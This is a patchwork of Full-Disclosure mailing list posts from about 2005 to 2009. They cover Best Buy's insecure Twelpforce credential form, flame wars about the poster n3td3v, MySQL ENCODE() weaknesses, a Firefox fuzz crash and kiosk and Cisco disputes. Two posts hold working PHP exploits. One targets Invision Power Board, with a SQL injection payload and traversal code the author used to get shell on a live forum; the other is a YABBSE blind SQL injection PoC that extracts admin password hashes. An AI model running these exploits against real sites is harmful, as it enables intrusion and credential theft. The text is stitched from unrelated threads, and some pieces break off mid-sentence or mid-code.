can be reached on 1337 and who blogs at http://simonthesnowmanftw.tk/)
being reassured by Mikel Insalaco: "I am the infamous Mikel Insalaco,
I am kind of a big thing. Muthasuckin Mahogany and leatherbound
books". As James Watters would say, the critique here writes iself?

This is in line with Dave Zatz's observations too in suggesting Has
Best Buy’s Twelpforce Already Failed? Dave draws attention to this
classy twelpforcer tweet (among others): "tweet tweet...im such a
homo" - definitely not the sort of thing I'd want associated with my
corporate branding, that's for sure.

This, viewers, is what Twitter has in mind for companies (having come
clean after TechCrunch aired their dirty laundry in public). They are
so excited in fact that "[they]'ve been studying how customers and
businesses interact and derive value from Twitter [and] are putting
together a document based on our studies and we'll find a spot on our
web site to share it with everyone when it's ready". Definitely
looking forward to leafing through that when it's available, though
I'm guessing there'll have to be some fairly agressive pre-press
filtering if this is what the raw feed looks like. Despite appearances
I do rather like Twitter and hope they do well - I'm just not
convinced this is how they're going to make their millions.

Cutting to the chase, see that third tweet: "@missladii0430
#Twelpforce If you are a Best Buy employee you can sign up here. -->
http://tinyurl.com/kp8jwb via @Agent8819". That employee sign up link
takes you here: http://bbyconnect.appspot.com/connect/signup/ See the
problem yet? The first thing they ask you for is "Please enter your
Best Buy employee number and password", followed immediately by your
"Best Buy Corporate email address".

What's that? You want my name (Best Buy addresses are
firstname.lastn...@bestbuy.com), corporate email, employee number and
corporate password to be sent over the big bad Internet? To a preview
release of a service hosted by someone else? That's ok, it's
encrypted, right? WRONG. Never mind, I'll just change "http" to
"https". Wrong again. Though Google App Engine supports SSL it's
disabled for this application/URL so even though it looks like it
works you've just been silently redirected back to the insecure
address. Oops.

So here we have Best Buy soliciting corporate credentials with no
encryption whatsoever, over the public Internet (including any local,
potentially unprotected wireless), to a preview release of a service
they have little control over and, it gets better, verifying them in
real time! If you enter random details into the form it will tell you
instantly (that's right, no tarpitting or other delays) that "Employee
number or password is incorrect". Don't have a Best Buy employee
number to try? That's ok because they're only a Google search away
(along with network configuration information including server names)
and there doesn't appear to be anything stopping you from trying as
many times as you like either so brute force away.

Normally I'd have reported this via the usual channels but they've not
given any contact information whatsoever (except via public Twitter)
and besides, it's such a comedy of errors that they're probably better
off shutting it down than trying to fix it anyway. What I don't get
more than anything else is why they would bother trying to roll their
own when there are plenty of perfectly good services like CoTweet and
HootSuite that are being used with far better results by the likes of
Ford, Coke, Pepsi, JetBlue, Sprint & StarBucks.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fwd: Police probe BNP link to car fire

[Sam Stelfox]

I think your missing my point, I haven't seen gadi get defensive enough
that it provoked the wrath of the regular posters on this list. It's
that wrath that I find so amusing.

n3td3v wrote:
> what about gadi? he's the same.
>
> On Fri, Nov 21, 2008 at 7:02 PM, Sam Stelfox <[EMAIL PROTECTED]> wrote:
>   
>> I find it terribly funny seeing how many people bash someone who has the 
>> temperament and intelligence of a high school
>> script kiddie.
>> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fwd: Police probe BNP link to car fire

[Sam Stelfox]

I figure this would be a good time for a first post to the list. I find
no merit in staying on this list, in fact the only reason I'm still on
this list is because I find it terribly funny seeing how many people
bash someone who has the temperament and intelligence of a high school
script kiddie. I know it's kind of sick and twisted but the responses
you get make my day.

n3td3v wrote:
> You don't actually know if anyone filters me or the opinion of anyone
> outside the full-disclosure active-user ring-of-trolls, you try and
> speak on behalf of the list valdis everyday, but the truth is you have
> no idea what the list thinks.
>
> On Fri, Nov 21, 2008 at 4:19 PM,  <[EMAIL PROTECTED]> wrote:
>   
>> On Fri, 21 Nov 2008 19:00:27 +0530, Mike C said:
>> 
>>> Yes, but it is statistically more likely you will read this if n3td3v posts
>>> it here.
>>>   
>> Actually, given the number of readers that either filter his postings 
>> outright,
>> or downgrade the interest value of something because he posts it, the
>> likelyhood probably *drops*.
>>
>> "n3td3v posted it, therefor it's probably so lame that it's not worth burning
>> the recycled electrons to go read it.."
>>
>> 
>>>  Thus his posting. I sense an air of hostility towards this security
>>> researcher, and dont understand the reason
>>>   
>> You're new here, aren't you?
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>> 
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>   

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Be careful what you google for, you might just find it!

[Sam Thomas]

Dear List,

 

The following is a cautionary tale, about what happens when you go around 
searching for generic vulnerabilities. It is quite long; if you don't want to 
read it I won't be offended. From a serious security perspective it contains 
information regarding recently patched SQL injection vulnerabilities in PHPShop 
and Virtuemart, two open source e-commerce solutions. It also contains 
technical information regarding why using MySQL's "ENCODE()" function to 
obfuscate sensitive data is not a safe practice. And further why it is 
particularly dangerous in the case of well structured data such as Credit Card 
numbers. I have not informed the MySQL developers as I do not believe this is 
what the function was intended for and the product already supplies more 
suitable functions for data encryption. However it is widely being used for 
this purpose and this is still currently the case in both PHPShop and 
Virtuemart. 

 

This function should not in any way be considered a safe method to protect 
sensitive data such as passwords or financial details. The attack presented 
here is effective only against numerical data but could easily be extended. I 
genuinely regret having executed the google search that I did, I ended up doing 
far more work pro bono than I ever would have wanted to. Perhaps if I had a 
more criminal bent I would be sitting on a beach in the Bahamas right now 
supping cocktails telling tales of how a simple google search had made me 
millions, but instead I'm writing a lengthy post to full-disclosure. 

 

About two months ago I was feeling bored and so decided to do something very 
stupid. I'd done it before and regretted it then, but I couldn't help myself. I 
opened up my web browser and typed "inurl:shop sql error" into the google 
toolbar. The usual array of online shops with trivial vulnerabilities showed up.

 

What took my interest this time was a chain of commercially run sites that 
seemed to be prone in quite a few user submitted variables. After a few "UNION 
SELECT 1,2,3,..." queries and a quick peek at the HTML I had a query that would 
list all the payment details for an order on the system (On their demo shop of 
course). However the most critical field, the credit card number, was 
gibberish. 

 

At this point I decided to place a few orders of my own with arbitrary numbers 
like "111...". I ran the query again on these new entries, and it still 
returned gibberish, but interesting gibberish. It was always 16 bytes long (The 
same as the original data), and any numbers which started the same had 
corresponding gibberish which started the same. It was time to return to the 
mighty google toolbar.

 

I tapped in the name of the credit card field from the database. A few clicks 
later and it became apparent that the shops were based on an early version of 
PHPShop and the numbers were being processed by MySQL's "ENCODE()" function. So 
back to the toolbar and click-click-click and the algorithm used by the 
"DECODE()" function is essentially:

 

crypt_int(password)

{

 Take the password as a seed and do some natty stuff with a random 
number generator to make a one-one transformation from the integers 0-255 onto 
themselves - Transformation[].

 Use the password again to generate a big old random number - Rand.

 Output Rand and Transformation[].

}

 

decode(encoded)

{

 shift=0.

 decoded="".

 for the length of encoded

 {

   shift=shift XOR myrand(Rand).

   index = (ASCII value of next character from encoded) XOR shift.

   decoded = decoded + CHR(Transformation[Index]).

   shift = shift XOR Transformation[Index].

 }

 Output decoded.

}

 

myrand(Rand)

{

  Output a sequence of pseudorandom numbers using Rand as a seed.

}

 

Now it was time to whip out my (not so) advanced cryptanalysis skills:

 

Observations:

Advanced cryptanalysis observation #1 - Credit Card numbers are 16 digits long.

Advanced cryptanalysis observation #2 - They consist of the digits 0-9 and 
nothing else.

 

Implications:

#1 - ACO1 means we only need consider the first 16 random numbers generated by 
myrand.

#2 - Since Transformation[] is one-one ACO2 means index is limited to 10 values.

 

Theorem:

 

It's possible to create a function capable of decoding all Credit Card numbers 
in a MySQL database if they are encoded with the "ENCODE()" function without 
knowing the password used if we know the encoded value of two simple plaintexts.

 

Consider the cunningly constructed plaintext "". 

Again using the fact that Transformation[] is one-one we know index takes one 
and only one value throughout the execution of the decoding algorithm. Now 
observe what happens between the generation of two digits:

 

index = (ASCII value of next character from encoded) XOR shift.

decoded = decoded + CHR(Transformation[index]).

shift = shift

Re: [Full-disclosure] Dear Neal Krawetz, will the real n3td3v please stand up?

[Sam]

Carole Chaski gave you a run for your money tho.

http://www.securityfocus.com/comments/articles/11419/34147/threaded#34147


Dr. Neal Krawetz PhD wrote:
> If you believe my method(s) was flawed, then demonstrate your claim(s).
>
> I used a repeatable scientific proof that conclusively proves my
> findings.  People constantly criticize me, claiming that I am wrong.
> However not one of these people are able to offer a valid scientific
> argument against me or my methods!  
>
> You are acting like an uneducated child.  Is this where you are?  Did
> you even attend a school of higher learning?  I should hope that no
> respected academic institution would allow such a pea-brained fool as
> yourself entrance!
>
> Grow up, learn, and come back to speak with me once you've learned what
> logic is and how to apply it.  Until then you are nothing.  You are the
> sort of person that believes bananas are proof that there is a God, when
> the truth is there is no God.  You simple-minded doofus.
>
> - neal
>
> On Mon, Jun 18, 2007 at 05:42:07PM -0700, coderman wrote:
>   
>> On 6/18/07, HACK THE GOV <[EMAIL PROTECTED]> wrote:
>> 
>>> n3td3v is NOT Gobbles
>>> Gobbles is NOT n3td3v
>>>   
>> a biased mind peers into the chasm that is full-disclosure:
>>
>>  "my god, it's full of [n3td3v | GOBBLES] !!!"
>>
>> ... your paper was interesting and inherently flawed; may you one day
>> discover the concept of "compounded errors".
>>
>> consider GOBBLES the slim shady; n3td3v the pimply imitator in a ford
>> festiva with plywood spoiler.  all you see is one annoyance, while
>> intact intellect discerns the substance from the shallow.
>>
>> don't worry, i'm only pissing on your expert security credentials, Dr.
>> Neal Krawetz, PhD., because i too am n3td3v... disguised via
>> artificial intelligence softwarez!
>>
>>
>> "L'enfer, c'est les autres" - Sartre
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>> 
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>   


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] firefox 2.0.0.2 crash

[Sam Hocevar]

On Fri, Mar 09, 2007, Tõnu Samuel wrote:

> http://people.zoy.org/~sam/firefox-crash-save-session-before-clicking.gif
> 
> I do NOT know anything else than this url. Just seen it in random
> discussion and anyone else I asked knows nothing. Current tests indicate
> that Mozilla 2.0.0.2 gets killed within second, 1.5.0.10 survives.

   I came up with that file using zzuf (http://sam.zoy.org/zzuf/).
Manpage has an example on how to fuzz Firefox.

Cheers,
-- 
Sam.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] SQL Injection in IPB <=2.1.3

[Sam Thomas]

Well this would be NDSD-06-002 but n3td3v
seems to have really left...All relevant details are in the message below,
the SQL injection was patched within a day
(http://forums.invisionpower.com/index.php?showtopic=204627), I believe the
other problems still exist.

 

-Original Message-
From: Sam Thomas 
Sent: 05
 January 2006 02:53
To: [EMAIL PROTECTED]
Subject: vulnerability disclosure

 



Hi,





 





I write to this address as I cannot find a better one to contact you on.
Could you please forward this message to the appropriate person(s).





 





I write to you to disclose three vulnreabilities within the ipb
software. I came across these whilst gaining access to pzforum.net as part of
the www.rootcontest.org contest. These
vulnerabilities are tested up to version 2.1.3.





 





Firstly I would  like to make it clear that I have no intention of
disclosing these vulnerabilities to anyone other than yourselves until they are
fully rectified.





 





The main vulnerability exisits in the lack of sanity
checking on the cookie topicsread:





 





if ( ! in_array( $name, array('topicsread',
'forum_read') ) )
      {
       return
$this->parse_clean_value(urldecode($_COOKIE[$this->vars['cookie_id'].$name]));
      }
      else
      {
       return
urldecode($_COOKIE[$this->vars['cookie_id'].$name]);
      }





allows injection with variables of the form:





 





$injection_array = array(1=>1,"1) UNION SELECT
1,session_id,session_ip_address,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
from ibf_admin_sessions where (1,1)=(1"=>2);





 





This can be used through the usercp to disclose pretty much any
information, including any files which can be accessed by load_file. (SELECT
INTO OUTFILE is also available on badly configured systems).





 





The second vulnerability exists in the handling if ip
addresses:





 





$addrs[] = $_SERVER['HTTP_CLIENT_IP'];
  $addrs[] =
$_SERVER['REMOTE_ADDR'];
  $addrs[] =
$_SERVER['HTTP_PROXY_USER'];
  
  foreach ( $addrs as $ip )
  {
   if ( $ip )
   {
$this->ip_address
= $ip;
break;
   }
  }



the
Client-IP header can easily be forged:

if
($sip!="") {$com.= "Client-Ip: $sip\n";}

This
essentially removes any security gained by the ip element of sessions.

The
third and final vulnerability exists in the mechanism for setting
up tasks:

This
vulnerability is only an issue once access has been gained to the admin panel.
There is a simple directory traversal exploit:

$tmppvar.=
"task_file=../../uploads/av-" . $forum_member_id .
".jpg&";

Thank you
for taking time to look at this, and please let me know that an appropriate
person has received it.

Thanks,
Sam

The following
code was used to gain shell access to pzforum.net through these
vulnerabilities. It creates a task which points to the users avatar, into which
s/he can place (.jpg comment field for instance) arbitrary php code, including
the passthru command etc

exploit.php:


$server
= "pzforum.net";
$port = 80;

//wait between checking sessions (90
minutes)
$interval = 60*90;

$forum_root
= "/";
$forum_root2 = "\/";
$forum_cookie_header="paz";
$forum_member_id=xxx;
$forum_pass_hash="";

$forum_validate_cookie=$forum_cookie_header
. "member_id=" . $forum_member_id . ";" . $forum_cookie_header
. "pass_hash=" . $forum_pass_hash . ";";

//
get initial session_id
$injection_array = array(1=>1,"1)
UNION SELECT
1,session_id,session_ip_address,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
from ibf_admin_sessions where (1,1)=(1"=>2);
$tmpcookie= $forum_validate_cookie .
$forum_cookie_header . "topicsread=" .
urlencode(serialize($injection_array)) . ";";

echo
"*** ATTEMPTING TO GET OLD SESSION INFO ***\r\n";

$tmppage
=
getPage($server,$port,$forum_root."index.php?act=UserCP&CODE=00","",$tmpcookie);


if (preg_match("/]*>(.*)<\/a><\/span>[^<]*]*>(.*)<\/span>/",$tmppage,$tmpmatches))
{
 $session_id=$tmpmatches[1];
 $ip_address=$tmpmatches[2];

 echo
"old session: ip - " . $ip_address ." , " .
"session_id - " . $session_id . "\r\n";


 // wait for a new session
 $new_session=false;
 echo "*** WAITING FOR A NEW
SESSION ***\r\n";


 while (!$new_session)
 {
  sleep($interval);
  $tmppage =
getPage($server,$port,$forum_root."index.php?act=UserCP&CODE=00","",$tmpcookie);
  preg_match("/]*>(.*)<\/a><\/span>[^<]*]*>(.*)<\/span>/",$tmppage,
$tmpmatches);
  if
($tmpmatches[1]==$session_id)
  {
   echo ".";
  }
  else
  {
   $session_id=$tmpmatches[1];
   $ip_address=$tm

[Full-disclosure] NDSD-06-001

[Sam Thomas]

Hey str0ke - Are you the same str0ke whose code I've been ripping, damn I guess 
I better release my first N3td3v Sponsering Disclosure.

NDSD-06-001: YABBSE SQL Injection
June 23, 2006

-- Sponsered post

http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046903.html

-- Affected Vendor:
The YABB SE Team

-- Affected Products:
YABBSE (This product is discontinued, but unfortunately still seems to be in 
mainstream use)

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary SQL on 
vulnerable installations of the YABBSE message board. 

The specific flaw exists within the "profile.php" php script which is used to 
give access to user profiles.

-- Vendor Response:The vendor for this product essentially no longer exists. It 
is recommended that you move to a supported message board.

-- Disclosure Timeline:
2005.06.26 - Vulnerabiliity Discovered
2005.06.27 - Vendor found to have discontinued support
2006.06.23 - Public release of advisory

-- Vulnerability

The vulnerability exists where the user supplied variable $user is processed by 
the urldecode() function twice, this allows for the %2527 (decodes to %27 
decodes to ') SQL injection technique.

- Exploit

The following PoC exploit can be used to retrieve any users (IE admin) password 
hash which in turn can be used to immitate and login as that user:

**BEGIN PoC Code

http://www.milw0rm.com/exploits/1036 
  so credit to str0ke and milkw0rm
*/

$server = "www.uberhacker.com  ";
$user="Dozix007"
$port = 80;

$hash = "";

$hex = "0123456789abcdef";
for($i = 1; $i <= 32; $i++ ) {
$idx = 0;
$found = false;

while( !($found) ) {
$letter = substr($hex, $idx, 1);

/* %2527 translates to %27, which gets past magic quotes. This 
is translated to ' by urldecode. */

$url="/cgi-pbin/board/index.php?board=;action=viewprofile;user=$user%2527+AND+mid(passwd,$i,1)=%2527"
 . $letter;
$header = getHeader($server, $port, $url, "");
if(!preg_match("/An Error Has Occurred/",$header) ) {
echo $i . ": " . $letter . "\n";
$found = true;
$hash .= $letter;
} else {
$idx++;
}
}
}

echo "\n\nFinal Hash: $hash\n";

function getHeader($server, $port, $file, $cookie) {
$ip = gethostbyname($server);
$fp = fsockopen($ip, $port);

if (!$fp) {
return "Unknown";
} else {
$com = "GET $file HTTP/1.1\r\n";
$com .= "Host: $server:$port\r\n";
$com .= "Connection: close\r\n";
$com .= "\r\n";

fputs($fp, $com);
   
   $header="";

do {
$header.= fread($fp, 512);
} while( !preg_match('/\r\n\r\n$/',$header) );
}

return $header;
}
?>
// jazzy2fives 2005-07-26 - mostly stolen from milw0rm.com [2005-06-08] 

** End PoC Code

-- Patch

It is recomended that if you insist on continuing the use of this product, you 
remove the line which reads "$user = urldecode($user);" from all functions in 
"\sources\proflie.php"

-- Credit:

This vulnerability was discovered by me! 

-- About N3td3v Sponsoring Disclosures:

Established by me, n3td3v sponsering disclosures (NDSD) is a system established 
to reward n3td3v for his (her?) posts to full disclosure which bring me more 
amusement than any 0-day possibly could. 

The NDSD is unique in how vulnerability information sponsers the incompetency 
of n3td3v, for each amusing n3td3v post NDSD will attempt to release a 
disclosure of a previously unknown lame exploit. This is because most valid 
complaints aginst n3td3v claim that (s/)he contributes nothing to the secutiy 
comunity. The aim of NDSD is to sponser n3td3v posts thus ensuring that each 
directly corresponds to a positve contribution to FULL-DISCLOSURE.

-- Misc

For anyone interested, this was the exploit used to hijack www.uberhacker.com 
  - a legal hacker trainng site, which had as their 
primary challenge to hijack the website. The site has since had the majority of 
it's content removed.

NDSD are a subsidiary of empty vessels (www.emptyvessels.org.uk 
 ), one day we might get our website up.



***

For more information about Aquaterra Leisure, see www.aquaterra.org

To shop for speedo or polar at bargain prices, see www.aquashop.org

***


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.co

Re: [Full-disclosure] Sensitive Information Disclosure Vulnerability in Kinetics Kiosk Product

[Sam Evans]

Jason,

Not that I disagree with you here, but I am not sure I understand why
you think that connecting to a host outside the private address ranges
is irresponsible by the company?

The connectivity from this Kiosk to the destination displayed could be one of:

The destination host only allows point to point connectivity,
controlled by a firewall or that the connectivity from this Kiosk is
through a VPN connection.

I also don't see the difference of using Internet Explorer versus any
other browser.  Script errors are script errors and will be
displayed regardless which browser they use unless specifically
disabled (as you mentioned).



On 8/18/05, Jason Coombs <[EMAIL PROTECTED]> wrote:
The
following script error message was noted being displayed this morning
on an airline check-in kiosk manufactured by Kinetics USA.Vendor: Kinetics USAwww.kineticsUSA.comLine: 107Char: 2Error: object expectedCode: 0
URL: http://151.151.10.46:64080/attract?time=1124376480&TransactionID=HNL_KIOSK09-050818044716Clearly,
building a product such as a publicly-accessible airline passenger
check-in kiosk using Internet Explorer and Windows is a very bad design
decision if you care at all about preventing this sort of information
disclosure.Even so, IE can and should be configured so as not to display such script errors.Furthermore, the use of an IP address that is outside of the RFC 1918 private subnet address range appears very irresponsible.
Sincerely,Jason Coombs[EMAIL PROTECTED]___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] RE: Getting a clue at Cisco

[Sam Evans]

Just curious -- if the April patch fixed the vulnerability discussed, then that would mean (according to Cisco) that the vulnerability affected IPV6 and not IPV4, correct?
 
 
On 8/1/05, byte_jump <[EMAIL PROTECTED]> wrote:
In my opinion, probably the grossest error made by Cisco in all ofthis was silently patching their IOS back in April. Anyone who's ever
used Cisco's software knows that you can never run the latest release,unless you want things to break, and break badly. As a result, howmany organizations were at the latest, patched IOS release as ofBlackHat? Not many, I'd wager. If, however, Cisco had come clean and
told everyone that there is a serious problem in their IOS andexploitation is being actively researched by Chinese hacker groups,you'd see a lot more uptake of that April IOS release. Instead, Ciscohangs their customers out to dry.
Shameful, just shameful.___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/